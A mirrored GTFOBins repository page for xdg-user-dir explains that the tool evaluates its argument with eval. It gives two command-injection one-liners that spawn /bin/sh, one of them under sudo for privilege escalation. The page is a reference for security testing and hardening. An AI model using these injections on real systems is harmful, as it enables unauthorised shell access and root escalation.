1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-16 17:01:38 +02:00
GTFOBins.github.io/_gtfobins/xdg-user-dir.md

12 lines
310 B
Markdown
Raw Permalink Normal View History

---
description: |
The current implementation of `xdg-user-dir` is basically `eval echo \${XDG_${1}_DIR:-$HOME}`, thus is can be easily used to achieve command execution.
functions:
shell:
- code: |
xdg-user-dir '}; /bin/sh #'
sudo:
- code: |
sudo xdg-user-dir '}; /bin/sh #'
---